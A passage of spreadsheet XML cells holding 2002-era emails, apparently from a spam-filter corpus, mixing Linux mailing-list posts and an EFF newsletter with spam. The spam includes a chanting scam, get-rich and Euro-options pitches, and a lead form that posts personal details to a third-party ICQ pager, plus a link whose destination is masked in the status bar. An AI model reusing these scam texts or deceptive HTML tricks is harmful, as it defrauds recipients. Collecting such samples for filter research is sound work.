 &gt; working perfectly on my Cyrix 333 box!).
 &gt; 
 &gt; Now, I desperately need some games, especially TuxKart and FlightGear, but I 
 &gt; forever get stuck on a dependency: everything needs OpenGL. Querying the rpm 
 &gt; database for OpenGL gets me nowhere fast. Can anyone point me in the right 
 &gt; direction? What, in RedHat, provides OpenGL?
 &gt; 
 If you have an NVIDIA card, the NVIDIA_GLX rpm provides OpenGL. It's for
 the NVidia proprietory drivers.
 Daniel
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Where can i find a positif mail(spam) for test
</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,
    I'm writting a Python script, in order to use Razor with Qmail.
    The script is finish, but i want to test the result with positive
    mail (spam). Somebody knows, whrere can i find one.
    PS : Escuse my pooooooor English ;-))
 --
 Toorop 
 Lorsque que vous avez limin l'impossible, ce qui reste, 
 mme si c'est improbable, doit tre la vrit.
 www.spoonsdesign.com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</si>
  <si>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On Thu, Aug 08, 2002 at 11:51:18AM -0600, Scott Wunsch mentioned:
 &gt; On Thu, 08-Aug-2002 at 11:31:01 +0100, John P. Looney wrote:
 &gt; &gt;  I've installed Redhat 7.3 on a raq3's disk. But fscked if I can get the
 &gt; &gt; kernel in /boot/vmlinuz-2.4.18-3 to boot. It's insisting pulling the
 &gt; &gt; kernel from ... somewhere else. The old cobalt kernel.
 &gt; http://www.gurulabs.com/rgh-cobalt-howto/index.html
 &gt; 
 &gt; The Cobalt systems have some neat firmware boot code that will read the
 &gt; ext2 filesystem and find the kernel itself... if you put it exactly where
 &gt; they expect it.
  Alas, I've been following that howto, and it doesn't seem to work. It
 could be because i'm using ext3 for the rootfs though.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Matthias wrote :
 &gt; On Thu, 18 Jul 2002 13:00:29 +0200
 &gt; Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; 
 &gt; &gt; Once upon a time, Matthias wrote :
 &gt; &gt; &gt; ..see subject.
 &gt; &gt; ..see valhalla.freshrpms.net ;-)
 &gt; 
 &gt; Hi, Matthias,
 &gt; 
 &gt; You should temporarly remove gentoo 0.11.29 from valhalla.freshrpms.net.
 &gt; This build (and 0.11.28) has a strong bug: Problems with copying "deep"
 &gt; directories.
 &gt; 
 &gt; Have reported this to Emil, he looks currently into it, a fix should be
 &gt; available soon..
 &gt; 
 &gt; Sorry
 Done.
 Well, I feel especially sorry for him since he already qualified 0.11.28 of
 "brown paper bag" release because of the column header clicking bug :-((
 I'll put up the next version as soon as it's out hoping it'll fix all
 current issues!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</si>
  <si>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Good idea!
 This could also be a job for P2P; lots of people would love to
 devote their spare cycles, bandwidth, and unblocked IP addresses
 to giving the Chinese unfettered net access.
 In a sense, this is what the "peek-a-booty" project does:
    http://www.peek-a-booty.org
 But let's play out the next few moves:
 Good Guys: Google enables SSL access
  Bad Guys: Chinese government again blocks all access to Google domains
 Good Guys: Set up Google proxies on ever-changing set of hosts (peek-a-booty)
  Bad Guys: Ban SSL (or any unlicensed opaque traffic) at the national firewall
 Good Guys: Hide Google traffic inside other innocuous-looking activity
  Bad Guys: Require nationwide installation of client-side NetNannyish
            software
 Good Guys: Offer software which disables/spoofs monitoring software
  Bad Guys: Imprison and harvest organs from people found using
            monitoring-disabling-software
 ...and on and on.
 The best we can hope is that technological cleverness, by raising the
 costs of oppression or by provoking intolerable oppression, brings
 social liberalization sooner rather than later.
 - Gordon
 ----- Original Message -----
 From: "Rohit Khare" &lt;khare@alumni.caltech.edu&gt;
 To: &lt;fork@example.com&gt;
 Sent: Monday, September 23, 2002 2:44 PM
 Subject: How about subsidizing SSL access to Google?
 [a cheeky letter to the editors of the Economist follows, along with the
 article I was commenting on... Rohit]
 In your article about Chinese attempts to censor Google last week ("The
 Search Goes On", Sept. 19th), the followup correctly noted that the most
 subversive aspect of Google's service is not its card catalog, which
 merely points surfers in the right direction, but the entire library. By
 maintaining what amounts to a live backup of the entire World Wide Web,
 if you can get to Google's cache, you can read anything you'd like.
 The techniques Chinese Internet Service Providers are using to enforce
 these rules, however, all depend on the fact that traffic to and from
 Google, or indeed almost all public websites, is unencrypted. Almost all
 Web browsers, however, include support for Secure Sockets Layer (SSL)
 encryption for securing credit card numbers and the like. Upgrading to
 SSL makes it effectively impossible for a 'man-in-the-middle' to meddle;
 censorship would have to be imposed on each individual computer in
 China. The only choice left is to either ban the entire site (range of
 IP addresses), but not the kind of selective filtering reported on in
 the article.
 Of course, the additional computing power to encrypt all this traffic
 costs real money. If the United States is so concerned about the free
 flow of information, why shouldn't the Broadcasting Board of Governors
 sponsor an encrypted interface to Google, or for that matter, the rest
 of the Web?
 To date, public diplomacy efforts have focused on public-sector
 programming for the Voice of America, Radio Sawa, and the like. Just
 imagine if the US government got into the business of subsidizing secure
 access to private-sector media instead. Nothing illustrates the freedom
 of the press as much as the wacky excess of the press itself -- and most
 of it is already salted away at Google and the Internet Archive project.
 On second thought, I can hardly imagine this Administration *promoting*
 the use of encryption to uphold privacy rights. Never mind...
 Best,
    Rohit Khare
 ===========================================================
 The search goes on
 China backtracks on banning Googleup to a point
 Sep 19th 2002 | BEIJING
  From The Economist print edition
 IN CHINESE, the nickname for Google, an American Internet search engine,
 is gougou, meaning doggy. For the country's fast-growing population of
 Internet users (46m, according to an official estimate), it is proving
 an elusive creature. Earlier this month, the Chinese authorities blocked
 access to Google from Internet service providers in Chinaapparently
 because the search engine helped Chinese users to get access to
 forbidden sites. Now, after an outcry from those users, access has been
 restored.
 An unusual climbdown by China's zealous Internet censors? Hardly. More
 sophisticated controls have now been imposed that make it difficult to
 use Google to search for material deemed offensive to the government.
 Access is still blocked to the cached versions of web pages taken by
 Google as it trawls the Internet. These once provided a handy way for
 Chinese users to see material stored on blocked websites.
 After the blocking of Google on August 31st, many Chinese Internet users
 posted messages on bulletin boards in China protesting against the move.
 Their anger was again aroused last week when some Chinese Internet
 providers began rerouting users trying to reach the blocked Google site
 to far less powerful search engines in China.
 Duncan Clark, the head of a Beijing-based technology consultancy firm,
 BDA (China) Ltd, says China is trying a new tactic in its efforts to
 censor the Internet. Until recently, it had focused on blocking
 individual sites, including all pages stored on them. Now it seems to be
 filtering data transmitted to or from foreign websites to search for key
 words that might indicate undesirable content. For example earlier this
 week when using Eastnet, a Beijing-based Internet provider, a search on
 Google for Falun Gonga quasi-Buddhist exercise sect outlawed in China
 usually aborted before all the results had time to appear. Such a search
 also rendered Google impossible to use for several minutes.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Blessing People
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,
 I wanted to spread this good karma to you.
 This is my true experiance. Six months back my shoe company was going bankrupt in a time of one month. I have no where to turn to. Luckily I met this guy Michael at www.blessing-people.com This is a non-profit web site. He really saved me. He started to chant for mine business without asking for any money when I told him my story. In just 10 days my business turn around. At the end of the month I could pay my monthly loan instalment. Thing steadily stabilized. Immediately I subscribe to his chanting servies. Those money Michael collected are for donation later in every year. I know I must have been creating good karma by subscribing to his prayers services. Now I am hunting for my second shop. Thanks to Michael.
 I do not have any connection to him. I am just spreading this good karma just to repay what he had did for me. I deeply know what ever he did it's a miracle to me. Even until today all I know was Michael chant for me &amp; many people.. And many miracle happened.
 I am sorry if this email annoy you. I am not promoting Michael or my business this email can be clearly seen.
 Please help spread this good karma around. Direct people to Michael. Creat good karma today for you future!
 Tan E.G.
 @pls: Click www.blessing-people.com    Go there to feel his energy!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Financial Opportunity [eew58]
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY BGCOLOR="WHITE" TEXT="BLACK"&gt;
 &lt;TABLE WIDTH=600&gt;&lt;TR&gt;&lt;TD&gt;&lt;FONT SIZE=4 FACE="VERDANA"&gt;
 There are more financial opportunities out there than ever
 before. The majority of those that succeed don't follow the
 rules, they bend them, avoid them or go around them.&lt;BR&gt;&lt;BR&gt;
 Freedom 55 is for the suckers. You don't have to work 40 to
 60 hours a week for 40 years all to make someone else wealthy.
 We have a better way!&lt;BR&gt;&lt;BR&gt;
 &lt;UL&gt;
 &lt;LI&gt;Are You Interested In creating immediate wealth?&lt;BR&gt;&lt;BR&gt;
 &lt;LI&gt;Have you considered improving the Quality of your Life?&lt;BR&gt;&lt;BR&gt;
 &lt;LI&gt;Do you currently have the home, the car and the life style that you dream of?
 &lt;/UL&gt;&lt;BR&gt;
 Our business develops 6 Figure Income Earners, quickly and
 easily. Let us show you how you can go from just getting by
 to earning over $100,000 in your first year of business.&lt;BR&gt;&lt;BR&gt;
 For more information about this incredible life changing
 opportunity, please complete the form below. The information
 is FREE, confidential and you are under no risk or obligations.&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;FORM Name="pagerform" action="http://wwp.icq.com/whitepages/page_me/1,,,00.html" method="Post"&gt;
 &lt;INPUT type="hidden" name="fromemail" value="biz@b.com"&gt;
 &lt;INPUT type="hidden" name="from" value="biz@b.com"&gt;
 &lt;INPUT type=hidden name="recipient" value="billjennings70@yahoo.co.uk"&gt;
 &lt;CENTER&gt;&lt;TABLE&gt;&lt;TR&gt;&lt;TD WIDTH=50% VALIGN="TOP"&gt;
 &lt;TABLE CELLSPACING=2&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Name&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{name}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="30"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Address&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{address}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="35"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;City&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{city}}"&gt;&lt;INPUT Name="body" Size="21" Maxlength="30"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;State&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{state}}"&gt;
 &lt;SELECT Name="body"&gt;
 &lt;OPTION VALUE=""&gt;&lt;/OPTION&gt;
 &lt;OPTION VALUE="AL"&gt; Alabama
 &lt;OPTION VALUE="AK"&gt; Alaska
 &lt;OPTION VALUE="AZ"&gt; Arizona
 &lt;OPTION VALUE="AR"&gt; Arkansas
 &lt;OPTION VALUE="CA"&gt; California
 &lt;OPTION VALUE="CO"&gt; Colorado
 &lt;OPTION VALUE="CT"&gt; Connecticut
 &lt;OPTION VALUE="DE"&gt; Delaware
 &lt;OPTION VALUE="DC"&gt; Dist of Columbia
 &lt;OPTION VALUE="FL"&gt; Florida
 &lt;OPTION VALUE="GA"&gt; Georgia
 &lt;OPTION VALUE="HI"&gt; Hawaii
 &lt;OPTION VALUE="ID"&gt; Idaho
 &lt;OPTION VALUE="IL"&gt; Illinois
 &lt;OPTION VALUE="IN"&gt; Indiana
 &lt;OPTION VALUE="IA"&gt; Iowa
 &lt;OPTION VALUE="KS"&gt; Kansas
 &lt;OPTION VALUE="KY"&gt; Kentucky
 &lt;OPTION VALUE="LA"&gt; Louisiana
 &lt;OPTION VALUE="ME"&gt; Maine
 &lt;OPTION VALUE="MD"&gt; Maryland
 &lt;OPTION VALUE="MA"&gt; Massachusetts
 &lt;OPTION VALUE="MI"&gt; Michigan
 &lt;OPTION VALUE="MN"&gt; Minnesota
 &lt;OPTION VALUE="MS"&gt; Mississippi
 &lt;OPTION VALUE="MO"&gt; Missouri
 &lt;OPTION VALUE="MT"&gt; Montana
 &lt;OPTION VALUE="NE"&gt; Nebraska
 &lt;OPTION VALUE="NV"&gt; Nevada
 &lt;OPTION VALUE="NH"&gt; New Hampshire
 &lt;OPTION VALUE="NJ"&gt; New Jersey
 &lt;OPTION VALUE="NM"&gt; New Mexico
 &lt;OPTION VALUE="NY"&gt; New York
 &lt;OPTION VALUE="NC"&gt; North Carolina
 &lt;OPTION VALUE="ND"&gt; North Dakota
 &lt;OPTION VALUE="OH"&gt; Ohio
 &lt;OPTION VALUE="OK"&gt; Oklahoma
 &lt;OPTION VALUE="OR"&gt; Oregon
 &lt;OPTION VALUE="PA"&gt; Pennsylvania
 &lt;OPTION VALUE="RI"&gt; Rhode Island
 &lt;OPTION VALUE="SC"&gt; South Carolina
 &lt;OPTION VALUE="SD"&gt; South Dakota
 &lt;OPTION VALUE="TN"&gt; Tennessee
 &lt;OPTION VALUE="TX"&gt; Texas &lt;OPTION VALUE="UT"&gt; Utah
 &lt;OPTION VALUE="VT"&gt; Vermont
 &lt;OPTION VALUE="VA"&gt; Virginia
 &lt;OPTION VALUE="WA"&gt; Washington
 &lt;OPTION VALUE="WV"&gt; West Virginia
 &lt;OPTION VALUE="WI"&gt; Wisconsin
 &lt;OPTION VALUE="WY"&gt; Wyoming
 &lt;/SELECT&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;&lt;TD WIDTH=50% VALIGN="TOP"&gt;
 &lt;TABLE CELLSPACING=2&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Zip Code&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{zipcode}}"&gt;&lt;INPUT Name="body" Size="21" Maxlength="20"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Home Phone&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{phone}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="20"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Time to Contact&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{besttime}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="30"&gt;&lt;INPUT type="hidden" name="to" value="158884563"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;E-Mail&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;/TD&gt;&lt;TD&gt;&lt;INPUT Type="hidden" Name="body" Value="{{email}}"&gt;&lt;INPUT Type="text" Size="21" Name="body" Maxlength="30"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD ALIGN="CENTER" COLSPAN=2&gt;&lt;FONT FACE="ARIAL" SIZE=2&gt;&lt;B&gt;Desired Monthly Income&lt;/B&gt;&lt;/FONT&gt; &amp;nbsp;&amp;nbsp;&lt;INPUT Type="hidden" Name="body" Value="{{desiredincome}}"&gt;
 &lt;SELECT Name="body"&gt;
 &lt;OPTION VALUE=""&gt;&lt;/OPTION&gt;
 &lt;OPTION VALUE="$500"&gt;$500
 &lt;OPTION VALUE="$1000"&gt;$1000
 &lt;OPTION VALUE="$2500"&gt;$2500
 &lt;OPTION VALUE="$5000+"&gt;$5000+
 &lt;/SELECT&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;TD ALIGN="CENTER" COLSPAN=2&gt;&lt;BR&gt;&lt;INPUT Type="submit" Value="  Submit  "&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;&lt;/CENTER&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/FORM&gt;
 ----------&lt;BR&gt;
 To receive no further offers from our company regarding
 this subject or any other, please reply to this
 e-mail with the word 'Remove' in the subject line.&lt;BR&gt;&lt;BR&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
 st4t6p42
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-08-14 at 07:16, Victor wrote:
 &gt; Can someone tell me what I am doing wrong? it's like make doesn't take the
 &gt; PREFIX override... It's crazy. I don't get it...
 &gt; OS: TurboLinux6 rmp3.0.6 make 3.79.1
 I'm decoding this to mean:
 "This spec file installs in the system, rather than in the build root,
 even though I am passing the relevant overrides to make. It is as if the
 Makefile does not allow overrides, or does not have those variables."
 I note that:
 1) It's one of those Makefile.PL things.
 2) While I know that Makefiles generated by a ./configure generated in
 turn by a later version of auto* do support the technique you're trying,
 I know nothing about what the Perl MakeMaker (or whatever it is)
 supports.
 The general solution for cases like this is to install manually (Try
 make -n and see what it does). I think that Perl's installer system
 might support an installation root, though I've blissfully no idea how
 to operate it.
 I suggest finding a small Perl module SRPM and looking at the spec file
 to see how RedHat (or Turbo, or PLD, although RedHat generally know
 *all* the tricks) do it.
 Dave.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Special Investor update.
</t>
  </si>
  <si>
    <t xml:space="preserve">On January 1st 2002, the European countries began
 using the new Euro.  Never before have so
 many countries with such powerful economies united
 to use a single currency.  Get your piece of history
 now!  We would like to send you a FREE Euro
 and a FREE report on world currency.  Just visit
 our site to request your Euro and Euro report:
 http://www.information-depot.com/EuroExchange/
 In addition to our currency report, you can receive
 our FREE INVESTMENT PACKAGE:
 *  Learn how $10,000 in options will leverage $1,000,000 in
 Euro Currency. This means even a small movement in the market
 has huge profit potential.
 If you are over age 18 and have some risk capital, it's
 important that you find out how the Euro will
 change the economic world and how you can profit!
 CLICK NOW! http://www.information-depot.com/EuroExchange/
 $10,000 minimum investment
 Please carefully evaluate your financial position before
 trading.  Only risk capital should be used.
 http://www.information-depot.com/takemeoff/ To OptOut.
</t>
  </si>
  <si>
    <t xml:space="preserve">On 10 Aug 2002, Gary Lawrence Murphy wrote:
 &gt; My uneducated guess is that all they need to jump expensive whitelist
 &gt; walls would be buckshot a spam-laden Klez with a 5-million-addresses
 &gt; mailer; if it finds just one vulnerable host on an Exchange server,
 &gt; through hopping addressbooks across a few degrees of freedom, a world
 &gt; of whitelists are instantly breechable.
 You seem to be saying that whitelists are useless, because there are worms
 which can compromise your system, read your address book/whitelist, and
 sent themselves on, compromising a nonnegligible fraction of systems as
 they go along. 
 While mailing lists can be spam/worm amplifiers, I don't think this is
 true for individual users even today. Moreover, worms which use email as
 vector exist *only* because a single vendor ships mailers with broken
 default settings, and insists to make documents executables. This makes
 for very bad press, and eventually that vendor is going to wise up, and 
 stop shipping as many broken wares (or people will switch to more secure 
 alternatives, whatever comes first).
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save 70% on laser toner and inkjet cartridges!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;New Page 2&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;
 &lt;font color="#0000FF"&gt;Due to heavy demand from our customers we are extending the
 &lt;b&gt; 5% EXTRA Off Coupon&lt;/b&gt; on all your purchases with Coupon Code &lt;b&gt;&lt;u&gt;RMSCY6P2&lt;/u&gt;
 &lt;/b&gt;upto July'30 2002
 and the offer is exclusively from us.&lt;/font&gt;
 &lt;p align="center"&gt;
 &lt;a href="http://www.qksrv.net/click-1084287-8406081" target="_blank" onmouseover="window.status='http://www.inkjetexperts.com';return true;" onmouseout="window.status=' ';return true;"&gt;
 &lt;img src="http://www.qksrv.net/image-1084287-8406081" width="688" height="383" alt="Get Blowout Savings on Inkjet Toner" border="0"&gt;&lt;/a&gt;
 &lt;div&gt;
   &lt;p align="center"&gt;&lt;font size="2"&gt;You received this letter because you signed
   up to receive offers from one of our affiliate sites.&lt;br&gt;
   &amp;nbsp; &lt;font color="#000000"&gt;To unsubscribe from our mailing list, Online
   Unsubscribe &lt;/font&gt;&lt;a href="http://Downloads.7a6a.net/downloads/unsubscribe.asp?id=jm@netnoteinc.com"&gt;&lt;font color="#000000"&gt;Click
   Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#000080"&gt; &lt;/font&gt;&lt;font color="#000000"&gt;or by&amp;nbsp;
   email&lt;/font&gt;&lt;font color="#000080"&gt; &lt;/font&gt;&lt;a href="mailto:remove@7a6a.net?subject=jm@netnoteinc.com"&gt;&lt;font color="#000000"&gt;Click
   Here&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
   &lt;span class="477581722-06062002"&gt;&lt;font color="#0000ff" face="Arial" size="2"&gt;&amp;nbsp;&lt;/font&gt;&lt;/span&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 05:06:59PM +0100, Matthew French wrote:
 &gt; On that note: is there any real benefit to using hard links? I avoid them as
 &gt; a rule, and cannot think of any good reason to use them at the moment.
 There are lots of benefits to using hard links, for all sorts of reasons. In
 this case, they are being used to provide two quite different namespaces
 for the same set of files.
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: More Freebies with Ryanair.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 We have extended our Free seat sale until Thursday 21st November
 For details see http://www.ryanair.com
 ***************************************************************************
 To celebrate the extension of our free seat sale our call card provider has
 Slashed rates and is now offering additional call credit for free.
 Visit  https://www.bumblebeecommunications.com/lowcostcalls/
 Buy a 27 phone card for only 19.99 - 
 a FREE phonecard with every purchase while stocks last.
 We have slashed our call rates again - we are committed to giving you
 cheaper rates all the time!
 Calls from	France	    Germany       U.K
 Austrailia	   	2c	   10c	            2p
 Austria	   	2c	     7c	            4p
 Canada	   	2c	     8c                  3p
 Germany	2c	     8c                  3p
 France	   	2c	     8c                  3p
 Greece	   	6c	   11c	            9p
 Hong Kong	4c	     8c                  3p
 Ireland	   	2c                8c                  2p
 Italy	         	2c	     7c                  3p
 Japan	         	5c	   12c                  5p
 Netherlands	2c	     8c                  3p
 Norway	   	2c	   10c	            4p
 Spain	         	2c	     8c                  3p
 Sweden	   	2c	     8c                  2p
 UK	         	2c	     8c	            2p
 U.S.A	         	2c	     8c                  2p
 Use our virtual  phone cards to make cheap international phone calls at home
 and abroad. Buy online now and collect your phone card immediately -   Sale
 now on!
 Click on Ryanair.com's low cost phone card partner
 https://www.bumblebeecommunications.com/lowcostcalls/
 NEW RYANAIR LOW COST MOBILE PHONE SERVICE
 Pre-register for our all new mobile phone service launching very soon, We
 will be offering a new no frills low cost mobile phone service
 https://www.bumblebeecommunications.com/lowcostcalls/registration.html
 =====================================================================
 E-MAIL DISCLAIMER
 This e-mail and any files and attachments transmitted with it 
 are confidential and may be legally privileged. They are intended 
 solely for the use of the intended recipient.  Any views and 
 opinions expressed are those of the individual author/sender 
 and are not necessarily shared or endorsed by Ryanair Holdings plc 
 or any associated or related company. In particular e-mail 
 transmissions are not binding for the purposes of forming 
 a contract to sell airline seats, directly or via promotions, 
 and do not form a contractual obligation of any type.   
 Such contracts can only be formed in writing by post or fax, 
 duly signed by a senior company executive, subject to approval 
 by the Board of Directors.
 The content of this e-mail or any file or attachment transmitted 
 with it may have been changed or altered without the consent 
 of the author.  If you are not the intended recipient of this e-mail, 
 you are hereby notified that any review, dissemination, disclosure, 
 alteration, printing, circulation or transmission of, or any 
 action taken or omitted in reliance on this e-mail or any file 
 or attachment transmitted with it is prohibited and may be unlawful.
 If you have received this e-mail in error 
 please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
 or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland.  
 ---
 You are currently subscribed to customers as: yyyy-ryanair@spamassassin.taint.org
 To unsubscribe send a blank email to leave-customers-949326K@mail.ryanairmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: traceback in new exmh
</t>
  </si>
  <si>
    <t xml:space="preserve">I just updated to the latest CVS - I had been running a build from June.  
 Hitting the Flist button gives the following traceback:
 syntax error in expression "int(17+1+(222-)*(19-17-2)/(224-))"
     while executing
 "expr int($minLine+1+($msgid-$minMsg)*($maxLine-$minLine-2)/($maxMsg-$minMsg))"
     (procedure "Ftoc_FindMsg" line 57)
     invoked from within
 "Ftoc_FindMsg $i"
     (procedure "Ftoc_ShowSequences" line 16)
     invoked from within
 "Ftoc_ShowSequences $F"
     (procedure "ScanFolder" line 81)
     invoked from within
 "ScanFolder inbox 0"
     invoked from within
 "time [list ScanFolder $F $adjustDisplay"
     (procedure "Scan_Folder" line 2)
     invoked from within
 "Scan_Folder $exmh(folder) $ftoc(showNew)"
     (procedure "Inc_PresortFinish" line 7)
     invoked from within
 "Inc_PresortFinish"
     invoked from within
 ".fops.flist invoke"
     ("uplevel" body line 1)
     invoked from within
 "uplevel #0 [list $w invoke]"
     (procedure "tkButtonUp" line 7)
     invoked from within
 "tkButtonUp .fops.flist
 "
     (command bound to event)
 It seems to only happen in a folder with no unseen messages.
 Chris, is this related to your recent changes?
 Scott
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EFFector 15.24: EFF Submits Comments to FCC, Johansen Trial
</t>
  </si>
  <si>
    <t xml:space="preserve">EFFector       Vol. 15, No. 24       August 9, 2002      ren@eff.org
 A Publication of the Electronic Frontier Foundation	  ISSN 1062-9424
 In the 224th Issue of EFFector:
 * EFF Submits Letter to FCC Chairman Regarding BPDG Proposal
 * Update on Intel Corp. v. Hamidi
 * DeCSS Author Johansen's Trial Rescheduled
 * Bunnie Presents Paper on XBox Reverse Engineering
 * Thanks to DefCon!
 * EFF Booth at LinuxWorld
 * Deep Links: Baen Books' Releases Reader-Friendly E-Books
 * Deep Links: Janis Ian on P2P
 * Deep Links: Hometown Paper Discusses Rep. Coble's Support of 
 	Berman P2P Hacking Bill
 * Administrivia
 For more information on EFF activities &amp; alerts: http://www.eff.org/
 To join EFF or make an additional donation:
 http://www.eff.org/support/ 
 EFF is a member-supported nonprofit.
 Please sign up as a member today!
 --------------------------------------------------------------------
 * EFF Submits Letter to FCC Chairman Regarding BPDG Proposal
 The Honorable Michael K. Powell Chairman Federal Communications
 Commission 445 12th Street, S.W. Suite 8C453 Washington, DC 20554
 BY FACSIMILE, ELECTRONIC MAIL, AND POSTAL MAIL
 Dear Chairman Powell:
 I am writing to you today in regards to the digital television
 Broadcast Flag; specifically, I write in response to Sen. Hollings'
 and Representatives Dingell and Tauzin's letters of July 19, which
 urged you to mandate the Broadcast Flag proposal outlined in the
 final report of the Broadcast Protection Discussion Group.
 The Electronic Frontier Foundation (EFF) is a donor-supported
 non-profit organization that works to uphold civil liberties
 interests in technology policy and law. EFF has played a critical
 role in safeguarding crucial freedoms related to computers, the
 Internet and consumer electronics devices, defeating the restriction
 on strong cryptography exports; securing the legal principle that
 Internet wiretaps must only proceed in conjunction with a warrant;
 and defending academics, researchers and commercial interests
 against DMCA-related prosecution.
 EFF was an active participant in the Broadcast Protection Discussion
 Group. We attended the group's meetings and conference calls and
 participated in the group's policy and technical mailing-lists. EFF
 also maintains a web-site that was and is the only public source of
 information on the Broadcast Flag negotiations and proposal. The
 site can be found at http://bpdg.blogs.eff.org. EFF devoted
 thousands of staff-hours to publicizing the existence and nature of
 the BPDG to the public, to civil liberties and consumer-advocacy
 groups, and to entrepreneurial companies and software authors whose
 products were threatened by the proceedings.
 When you and I met at Esther Dyson's PC Forum last March, we spoke
 briefly about the civil liberties interests that would be undermined
 by the Broadcast Protection Discussion Group's mandate. The BPDG
 proposal will have grave consequences for innovation, free
 expression, competition and consumer interests. Worst of all, it
 will add unnecessary complexity and expense to the DTV transition,
 compromising DTV adoption itself.
 As you are aware, technologists have traditionally manufactured
